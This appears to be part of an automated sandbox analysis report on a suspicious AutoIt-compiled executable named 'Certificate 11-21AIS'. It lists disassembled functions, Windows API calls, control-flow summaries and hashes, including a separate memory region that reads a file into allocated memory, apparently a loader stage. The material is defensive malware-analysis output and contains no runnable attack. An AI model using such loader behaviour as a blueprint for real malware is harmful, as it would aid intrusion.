• ___createFile.LIBCMT ref: 008F6361
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 008F636E
• __dosmaperr.LIBCMT ref: 008F6375
• __free_osfhnd.LIBCMT ref: 008F6395
• __invoke_watson.LIBCMT ref: 008F63C3
• __wsopen_helper.LIBCMT ref: 008F63DD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
• String ID: @
• API String ID: 3896587723-2766056989
• Opcode ID: b390181eede2d66df72b8ed5a63229f524dc5f4ee06bd8ca163bb732a5652191
• Instruction ID: e12eeb7f0e5a57bdc35d2f934b4f9e86df024a7053145e4d79226f2b19492343
• Opcode Fuzzy Hash: b390181eede2d66df72b8ed5a63229f524dc5f4ee06bd8ca163bb732a5652191
• Instruction Fuzzy Hash: 3B22367190460E9BEB299F78CC45BBD7B61FB41324F284228E721EB2E2E7358D60D751

Control-flow Graph

APIs
• _wcscpy.LIBCMT ref: 0090FA96
• _wcschr.LIBCMT ref: 0090FAA4
• _wcscpy.LIBCMT ref: 0090FABB
• _wcscat.LIBCMT ref: 0090FACA
• _wcscat.LIBCMT ref: 0090FAE8
• _wcscpy.LIBCMT ref: 0090FB09
• __wsplitpath.LIBCMT ref: 0090FBE6
• _wcscpy.LIBCMT ref: 0090FC0B
• _wcscpy.LIBCMT ref: 0090FC1D
• _wcscpy.LIBCMT ref: 0090FC32
• _wcscat.LIBCMT ref: 0090FC47
• _wcscat.LIBCMT ref: 0090FC59
• _wcscat.LIBCMT ref: 0090FC6E
  • Part of subcall function 0090BFA4: _wcscmp.LIBCMT ref: 0090C03E
  • Part of subcall function 0090BFA4: __wsplitpath.LIBCMT ref: 0090C083
  • Part of subcall function 0090BFA4: _wcscpy.LIBCMT ref: 0090C096
  • Part of subcall function 0090BFA4: _wcscat.LIBCMT ref: 0090C0A9
  • Part of subcall function 0090BFA4: __wsplitpath.LIBCMT ref: 0090C0CE
  • Part of subcall function 0090BFA4: _wcscat.LIBCMT ref: 0090C0E4
  • Part of subcall function 0090BFA4: _wcscat.LIBCMT ref: 0090C0F7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
• String ID: >>>AUTOIT SCRIPT<<<
• API String ID: 2955681530-2806939583
• Opcode ID: 0cc6082dd11ee2bd54fd1943f584511757dbe49b1e8bf70e962e71a06d8bf948
• Instruction ID: 08855314d98d7c4067c0dac7d753000ffeb0c2e3c47ed51f7a1bb8d6e8284e60
• Opcode Fuzzy Hash: 0cc6082dd11ee2bd54fd1943f584511757dbe49b1e8bf70e962e71a06d8bf948
• Instruction Fuzzy Hash: 1A91A272504345AFDB20EB58C851F9AB3E8FF84310F04896DF999D7292DB74EA44CB92

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 008C3F86
• RegisterClassExW.USER32(00000030), ref: 008C3FB0
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008C3FC1
• InitCommonControlsEx.COMCTL32(?), ref: 008C3FDE
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008C3FEE
• LoadIconW.USER32(000000A9), ref: 008C4004
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008C4013
Strings
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: 5f9e1ef8fd216a64e6853421f9391e2229b80c0a8fe9650e698b6eda024b31b3
• Instruction ID: 1a7ea323a10b07a66e7dab7f5d95b836ad9a3f92deb1a3b0efe7dac38d513a6a
• Opcode Fuzzy Hash: 5f9e1ef8fd216a64e6853421f9391e2229b80c0a8fe9650e698b6eda024b31b3
• Instruction Fuzzy Hash: F821F7B9D25318AFDB00DFA4EC89BCDBBB8FB09700F00421AF611A63A0D7B50545AF90

Control-flow Graph

APIs
  • Part of subcall function 0090BDB4: __time64.LIBCMT ref: 0090BDBE
  • Part of subcall function 008C4517: _fseek.LIBCMT ref: 008C452F
• __wsplitpath.LIBCMT ref: 0090C083
  • Part of subcall function 008E1DFC: __wsplitpath_helper.LIBCMT ref: 008E1E3C
• _wcscpy.LIBCMT ref: 0090C096
• _wcscat.LIBCMT ref: 0090C0A9
• __wsplitpath.LIBCMT ref: 0090C0CE
• _wcscat.LIBCMT ref: 0090C0E4
• _wcscat.LIBCMT ref: 0090C0F7
• _wcscmp.LIBCMT ref: 0090C03E
  • Part of subcall function 0090C56D: _wcscmp.LIBCMT ref: 0090C65D
  • Part of subcall function 0090C56D: _wcscmp.LIBCMT ref: 0090C670
• DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0090C2A1
• DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0090C338
• CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0090C34E
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0090C35F
• DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0090C371
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
• String ID:
• API String ID: 2378138488-0
• Opcode ID: e942133888fbc5ea93adfc9ffbb3cb0b5db36d355b1da2b7ae2002b1435cecb6
• Instruction ID: 294f937189edfae4b9bf51c25c778f01183e24cab08a802892c5d1a7903b460b
• Opcode Fuzzy Hash: e942133888fbc5ea93adfc9ffbb3cb0b5db36d355b1da2b7ae2002b1435cecb6
• Instruction Fuzzy Hash: 30C12CB1900219AFDF15DF99CC81EDEB7BDEF49300F1081AAF609E6151DB709A848F65

Control-flow Graph

(rendered graph not included; legend: Executed / Not Executed)
APIs
• DefWindowProcW.USER32(?,?,?,?), ref: 008C37B3
• KillTimer.USER32(?,00000001), ref: 008C37DD
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008C3800
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008C380B
• CreatePopupMenu.USER32 ref: 008C381F
• PostQuitMessage.USER32(00000000), ref: 008C382E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: TaskbarCreated
• API String ID: 129472671-2362178303
• Opcode ID: 40a63cfd6f67036366c73d1d059b7954e7b19119c343085c816b44f52dd68165
• Instruction ID: 7a7a8955fea781722dc773c834f0973025fc9a40e5264f5461e07f537ca163b8
• Opcode Fuzzy Hash: 40a63cfd6f67036366c73d1d059b7954e7b19119c343085c816b44f52dd68165
• Instruction Fuzzy Hash: 8D41F7F511824D6BDB246F689C49F7936B9F705305F00813DF902D62A1CA70DD43A762

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 008C3E79
• LoadCursorW.USER32(00000000,00007F00), ref: 008C3E88
• LoadIconW.USER32(00000063), ref: 008C3E9E
• LoadIconW.USER32(000000A4), ref: 008C3EB0
• LoadIconW.USER32(000000A2), ref: 008C3EC2
  • Part of subcall function 008C4024: LoadImageW.USER32(008C0000,00000063,00000001,00000010,00000010,00000000), ref: 008C4048
• RegisterClassExW.USER32(?), ref: 008C3F30
  • Part of subcall function 008C3F53: GetSysColorBrush.USER32(0000000F), ref: 008C3F86
  • Part of subcall function 008C3F53: RegisterClassExW.USER32(00000030), ref: 008C3FB0
  • Part of subcall function 008C3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008C3FC1
  • Part of subcall function 008C3F53: InitCommonControlsEx.COMCTL32(?), ref: 008C3FDE
  • Part of subcall function 008C3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008C3FEE
  • Part of subcall function 008C3F53: LoadIconW.USER32(000000A9), ref: 008C4004
  • Part of subcall function 008C3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008C4013
Strings
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: e440d4bdd5be9d5a15e1b6fb4aa3e691da4956ea8c89a654aeb202e568598c5b
• Instruction ID: 1bb2aa12f2367ae7e2d37af74ab0bb91376df47a4300b254413caf2532bff668
• Opcode Fuzzy Hash: e440d4bdd5be9d5a15e1b6fb4aa3e691da4956ea8c89a654aeb202e568598c5b
• Instruction Fuzzy Hash: 402162B4D18304ABCB14DFA9EC49B9DBFF9FB48710F00812AE604A33A0D7754645AF91

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1021 8eacb3-8eace0 call 8e6ac0 call 8e7cf4 call 8e6986 1028 8eacfd-8ead02 1021->1028 1029 8eace2-8eacf8 call 8ee880 1021->1029 1031 8ead08-8ead0f 1028->1031 1035 8eaf52-8eaf57 call 8e6b05 1029->1035 1033 8ead42-8ead51 GetStartupInfoW 1031->1033 1034 8ead11-8ead40 1031->1034 1036 8ead57-8ead5c 1033->1036 1037 8eae80-8eae86 1033->1037 1034->1031 1036->1037 1041 8ead62-8ead79 1036->1041 1038 8eae8c-8eae9d 1037->1038 1039 8eaf44-8eaf50 call 8eaf58 1037->1039 1042 8eae9f-8eaea2 1038->1042 1043 8eaeb2-8eaeb8 1038->1043 1039->1035 1046 8ead7b-8ead7d 1041->1046 1047 8ead80-8ead83 1041->1047 1042->1043 1048 8eaea4-8eaead 1042->1048 1049 8eaebf-8eaec6 1043->1049 1050 8eaeba-8eaebd 1043->1050 1046->1047 1052 8ead86-8ead8c 1047->1052 1053 8eaf3e-8eaf3f 1048->1053 1054 8eaec9-8eaed5 GetStdHandle 1049->1054 1050->1054 1055 8eadae-8eadb6 1052->1055 1056 8ead8e-8ead9f call 8e6986 1052->1056 1053->1037 1058 8eaf1c-8eaf32 1054->1058 1059 8eaed7-8eaed9 1054->1059 1057 8eadb9-8eadbb 1055->1057 1065 8eada5-8eadab 1056->1065 1066 8eae33-8eae3a 1056->1066 1057->1037 1063 8eadc1-8eadc6 1057->1063 1058->1053 1062 8eaf34-8eaf37 1058->1062 1059->1058 1064 8eaedb-8eaee4 GetFileType 1059->1064 1062->1053 1067 8eadc8-8eadcb 1063->1067 1068 8eae20-8eae31 1063->1068 1064->1058 1069 8eaee6-8eaef0 1064->1069 1065->1055 1073 8eae40-8eae4e 1066->1073 1067->1068 1070 8eadcd-8eadd1 1067->1070 1068->1057 1071 8eaefa-8eaefd 1069->1071 1072 8eaef2-8eaef8 1069->1072 1070->1068 1074 8eadd3-8eadd5 1070->1074 1076 8eaeff-8eaf03 1071->1076 1077 8eaf08-8eaf1a InitializeCriticalSectionAndSpinCount 1071->1077 1075 8eaf05 1072->1075 1078 8eae74-8eae7b 1073->1078 1079 8eae50-8eae72 1073->1079 1080 8eadd7-8eade3 GetFileType 1074->1080 1081 8eade5-8eae1a InitializeCriticalSectionAndSpinCount 1074->1081 1075->1077 1076->1075 1077->1053 1078->1052 1079->1073 1080->1081 1082 8eae1d 1080->1082 1081->1082 1082->1068
                                                                              APIs
                                                                              • __lock.LIBCMT ref: 008EACC1
                                                                                • Part of subcall function 008E7CF4: __mtinitlocknum.LIBCMT ref: 008E7D06
                                                                                • Part of subcall function 008E7CF4: EnterCriticalSection.KERNEL32(00000000,?,008E7ADD,0000000D), ref: 008E7D1F
                                                                              • __calloc_crt.LIBCMT ref: 008EACD2
                                                                                • Part of subcall function 008E6986: __calloc_impl.LIBCMT ref: 008E6995
                                                                                • Part of subcall function 008E6986: Sleep.KERNEL32(00000000,000003BC,008DF507,?,0000000E), ref: 008E69AC
                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 008EACED
                                                                              • GetStartupInfoW.KERNEL32(?,00976E28,00000064,008E5E91,00976C70,00000014), ref: 008EAD46
                                                                              • __calloc_crt.LIBCMT ref: 008EAD91
                                                                              • GetFileType.KERNEL32(00000001), ref: 008EADD8
                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 008EAE11
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                              • String ID:
                                                                              • API String ID: 1426640281-0
                                                                              • Opcode ID: 07b09be7188003bf32213ed07badd4c9e0629e072711ad338d917a46d6a5bd29
                                                                              • Instruction ID: 7c89c5bb5b2dbf9586372c5d894fe1d79f2d953bf384e5ac8c08efb75830a1ce
                                                                              • Opcode Fuzzy Hash: 07b09be7188003bf32213ed07badd4c9e0629e072711ad338d917a46d6a5bd29
                                                                              • Instruction Fuzzy Hash: D581F2719057868FDB28CF69C8805A9BBF0FF47B24B24425DD4A6EB3D1D734A802CB52

                                                                               Control-flow Graph
                                                                               • Graph 1083: function at 11b5230 (subcalls 11b2c80, 11b6140, 11b6390, 11b61a0; APIs CreateFileW, VirtualAlloc, ReadFile, CloseHandle, VirtualFree)
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 011B5301
                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 011B5527
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696607130.00000000011B2000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B2000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_11b2000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileFreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 204039940-0
                                                                              • Opcode ID: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                                              • Instruction ID: e8be1445a88caf7065bf0b56806644dadc2fe792454c97bb5be5e00bf11eb7c5
                                                                              • Opcode Fuzzy Hash: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                                              • Instruction Fuzzy Hash: A9A11A74E04209EBDB58CFA4C894BEEBBB6FF48305F108559E205BB280D7799A40CF55

                                                                               Control-flow Graph
                                                                               • Graph 1192: function at 8c49fb (subcalls 8cbcce, 8df4ea, 8c47b7, 8c6a63, 8c47e2; APIs RegOpenKeyExW, RegQueryValueExW * 2, RegCloseKey)
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 008C4A1D
                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009341DB
                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0093421A
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00934249
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue$CloseOpen
                                                                              • String ID: Include$Software\AutoIt v3\AutoIt
                                                                              • API String ID: 1586453840-614718249
                                                                              • Opcode ID: 70e86981c3588ff1a2319a4b33ce57f2693724de935e48506bea0ab2cd819ead
                                                                              • Instruction ID: a238ff293be5e1c2cff73e321bfafd010b48a48dd068d263a9572c21243c7178
                                                                              • Opcode Fuzzy Hash: 70e86981c3588ff1a2319a4b33ce57f2693724de935e48506bea0ab2cd819ead
                                                                              • Instruction Fuzzy Hash: D4117C75A01108BFEB10EBA8CD86EBF7BBCEF15344F000069B506E7191EA70AE45EB50

                                                                               Control-flow Graph
                                                                               • Graph 1219: function at 8c36b8 (single block; APIs CreateWindowExW * 2, ShowWindow * 2)
                                                                              APIs
                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008C36E6
                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008C3707
                                                                              • ShowWindow.USER32(00000000,?,?,?,?,008C3AA3,?), ref: 008C371B
                                                                              • ShowWindow.USER32(00000000,?,?,?,?,008C3AA3,?), ref: 008C3724
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CreateShow
                                                                              • String ID: AutoIt v3$edit
                                                                              • API String ID: 1584632944-3779509399
                                                                              • Opcode ID: 877dd6150410877fe03d1a203527164f5cab90a2f83543a034989e16defac2cd
                                                                              • Instruction ID: 3af0a55d30ae2792598822bdf19b0e32b36212e974d7c646d1b50813e13a8971
                                                                              • Opcode Fuzzy Hash: 877dd6150410877fe03d1a203527164f5cab90a2f83543a034989e16defac2cd
                                                                              • Instruction Fuzzy Hash: 0FF0DA755692D07AEB315B57AC08E672E7DD7C7F24B00001AFA04A62B0C5654896FBB1

                                                                               Control-flow Graph
                                                                               • Graph 1324: function at 11b5030 (subcalls 11b2c80, 11b4f20, 11b4f60, 11b3f20, 11b4fb0; APIs CreateFileW, VirtualAlloc, ReadFile, ExitProcess)
                                                                              APIs
                                                                                • Part of subcall function 011B4F20: Sleep.KERNELBASE(000001F4), ref: 011B4F31
                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 011B511E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696607130.00000000011B2000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B2000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_11b2000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileSleep
                                                                              • String ID: GHPJRD0HQ6
                                                                              • API String ID: 2694422964-1098286689
                                                                              • Opcode ID: 55234f63df76560a9d3c40128a4eeda02593b4eeecb15115214cea06a2ff9cd2
                                                                              • Instruction ID: d81c766bda205e0f569ea0ed5604b2fa0e57ad9709962b0ca59937dbd602061f
                                                                              • Opcode Fuzzy Hash: 55234f63df76560a9d3c40128a4eeda02593b4eeecb15115214cea06a2ff9cd2
                                                                              • Instruction Fuzzy Hash: E2518071D04249EBEF15DBA4C858BEEBB79AF44300F104198E609BB2C0DB751B45CBA6
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 008C522F
                                                                              • _wcscpy.LIBCMT ref: 008C5283
                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008C5293
                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00933CB0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                              • String ID: Line:
                                                                              • API String ID: 1053898822-1585850449
                                                                              • Opcode ID: 2801afb4583ed39ab3a88193de1a235cc664f729a3a9493c1569f1e99cef6535
                                                                              • Instruction ID: dbf9240cd49e75edf236320cd6b82cb58e42de3c39f25bb10a0293477ce6d395
                                                                              • Opcode Fuzzy Hash: 2801afb4583ed39ab3a88193de1a235cc664f729a3a9493c1569f1e99cef6535
                                                                              • Instruction Fuzzy Hash: EE31BC71018740AAD720EB64EC46FDAB7ECFB84314F00851EF599D2191EB70E6899B93
                                                                              APIs
                                                                                • Part of subcall function 008C41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,008C39FE,?,00000001), ref: 008C41DB
                                                                              • _free.LIBCMT ref: 009336B7
                                                                              • _free.LIBCMT ref: 009336FE
                                                                                • Part of subcall function 008CC833: __wsplitpath.LIBCMT ref: 008CC93E
                                                                                • Part of subcall function 008CC833: _wcscpy.LIBCMT ref: 008CC953
                                                                                • Part of subcall function 008CC833: _wcscat.LIBCMT ref: 008CC968
                                                                                • Part of subcall function 008CC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 008CC978
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                              • API String ID: 805182592-1757145024
                                                                              • Opcode ID: 219b15a004d4402fddfda822b2e85e5d7500d4e3242c7651986bec7e7a95d629
                                                                              • Instruction ID: b0f11a37994b914b76b98818cc3f4411f8c3c7fdf2ce54a89a9eb72ae4a472f6
                                                                              • Opcode Fuzzy Hash: 219b15a004d4402fddfda822b2e85e5d7500d4e3242c7651986bec7e7a95d629
                                                                              • Instruction Fuzzy Hash: C1913B71910219AFCF04EFA8C852AEEB7B4FF09314F10852AF456EB291DB349A44CF51
                                                                              APIs
                                                                                • Part of subcall function 008C5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00981148,?,008C61FF,?,00000000,00000001,00000000), ref: 008C5392
                                                                                • Part of subcall function 008C49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 008C4A1D
                                                                              • _wcscat.LIBCMT ref: 00932D80
